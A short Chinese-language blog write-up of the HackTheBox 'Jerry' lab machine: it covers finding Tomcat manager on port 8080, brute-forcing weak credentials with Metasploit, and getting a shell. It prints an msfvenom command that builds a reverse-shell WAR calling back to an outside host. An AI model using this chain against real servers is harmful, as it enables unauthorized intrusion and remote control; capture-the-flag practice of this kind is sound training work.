HackTheBox Jerry writeup | Dayu's Blog

HackTheBox Jerry writeup

去年注册完hackthebox,因为连接不上隧道一直没玩,今天连接上做道水题试试。

题目地址:https://www.hackthebox.eu/home/machines/profile/144

端口探测

仅开放8080,tomcat manager服务

爆破弱口令

使用msf自带字典爆破出密码

上传war包getshell

使用msfvenom生成反弹shell的war包

1
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.7 LPORT=8080 -f war > shell.war

deploy后访问getshell

拿到flag